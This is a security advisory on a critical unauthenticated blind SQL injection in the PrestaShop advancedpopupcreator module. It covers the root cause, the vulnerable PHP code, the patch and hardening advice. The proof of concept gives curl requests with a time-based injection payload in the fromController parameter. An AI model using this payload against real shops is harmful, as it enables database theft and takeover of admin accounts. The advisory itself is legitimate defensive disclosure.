CVE-2025-69633 – PrestaShop advancedpopupcreator Module SQL Injection

CVE-2025-69633

Summary

A critical SQL Injection vulnerability has been identified in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop.

The vulnerability allows a remote unauthenticated attacker to execute arbitrary SQL queries via the fromController parameter of the module’s popup controller endpoint.

The issue affects versions:

< 1.2.7

The vendor confirmed that the vulnerability is present at least since version 1.1.26. The exact introduction version has not been determined.

The vulnerability is fixed in:

1.2.7

This vulnerability was observed during incident response investigations and may have been actively exploited in the wild.

Vulnerability Details

  • CVE ID: CVE-2025-69633
  • CWE: CWE-89 – SQL Injection
  • CVSS 3.1: 9.8 (Critical)
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Attack Vector: Remote
  • Authentication Required: No
  • User Interaction: None

Affected Component

/modules/advancedpopupcreator/classes/AdvancedPopup.php

Vulnerable functions:

  • getPopups()
  • updateVisits()

Technical Description

The vulnerability originates from improper handling of the fromController parameter.

Root Cause

In:

controllers/front/popup.php

The parameter is retrieved via:

if ($controller = Tools::getValue('fromController')) {
    return $controller;
}

No sanitization is applied.

The value is later concatenated directly into SQL queries in:

classes/AdvancedPopup.php

Example vulnerable code:

$query .= ' AND (`controller_exceptions` = ""
    OR `controller_exceptions` IS NULL
    OR FIND_IN_SET("' . $controller . '", `controller_exceptions`))';

The $controller variable is not sanitized using pSQL() or any validation mechanism.

This allows injection of arbitrary SQL expressions.

Proof of Concept

Baseline Request (~1 second)

time curl -s -X POST "https://[TARGET]/module/advancedpopupcreator/popup" \
  -d 'updateVisits=1&fromController=index'

SQL Injection Test (~6 seconds)

time curl -s -X POST "https://[TARGET]/module/advancedpopupcreator/popup" \
  -d 'updateVisits=1&fromController=1" AND (SELECT SLEEP(5)) AND "1'

Result

Baseline: ~1.07s  
Injected: ~6.02s

The time-based delay confirms successful blind SQL injection.

Impact

A remote unauthenticated attacker can:

  • Extract sensitive database information
  • Retrieve administrator credentials
  • Extract password reset tokens
  • Discover back-office URLs
  • Fully compromise the PrestaShop administration panel
  • Execute arbitrary SQL queries with the privileges of the underlying database user.
  • Cause denial of service

Real-World Exploitation

During forensic investigation of a compromised merchant:

  • Admin email and reset token were extracted from ps_employee
  • Back-office URL retrieved from ps_connection
  • Full administrative compromise achieved

Patch

The issue was fixed by sanitizing $controller using pSQL():

- OR FIND_IN_SET("' . $controller . '", `controller_exceptions`))';
+ OR FIND_IN_SET("' . pSQL($controller) . '", `controller_exceptions`))';

Applied to:

  • Line ~371
  • Line ~986

Fixed version: 1.2.7

Additional Security Recommendations

In addition to upgrading to version 1.2.7 or later, we recommend implementing the following security measures:

  • Upgrade or remove the module immediately. If the module is not strictly required, uninstall and delete it entirely.

  • Change the default database prefix (ps_). Replace it with a longer, random and non-guessable prefix to reduce automated exploitation attempts targeting default table names.

  • Monitor third-party module vulnerabilities. Use a security monitoring solution that tracks known vulnerabilities affecting PrestaShop modules (e.g. free module PrestaScan Security or Zentria.

  • Enforce strong Back Office authentication controls. Enable Two-Factor Authentication (2FA), preferably TOTP-based for all accounts in BackOffice. Make sure that the module is not storing TOTP secret keys in plaintext within the database.

  • Restrict and rotate the Back Office URL. Do not expose the administration URL publicly. If it has been disclosed or indexed, rename and restrict it immediately.

  • Keep PrestaShop core and all modules up to date. Apply security updates as soon as they are released.

  • Deploy perimeter protection. Protect the application with a properly configured Web Application Firewall (WAF) and ensure hosting-level hardening (firewall rules, least-privilege database user, secure file permissions).

Timeline

  • 2025-12-10 – Vulnerability reported responsibly to Idnovate and PrestaShop security
  • 2025-12-10 – Vendor confirms fix released
  • 2025-12-18 – Affected versions confirmed (>= 1.1.26, fixed in 1.2.7)
  • 2025-12-18 – CVE requested from MITRE
  • 2026-01-28 – MITRE assigned CVE-2025-69633
  • 2026-02-02 – Final technical verification prior to publication
  • 2026-02-13 – Publication of the CVE

Vendor acknowledged the vulnerability.

References

Credits

  • Discoverer:
    Esokia (Researcher: Maxime Morel-Bailly)

  • Technical assistance:
    Profileo.com / 772424.com

Acknowledgments

We thank the Idnovate team and the PrestaShop security team for their cooperation and responsiveness.

Disclaimer

This advisory is published for defensive and informational purposes.
Users of affected versions are strongly encouraged to upgrade immediately to version 1.2.7 or later.

cve  prestashop  sqli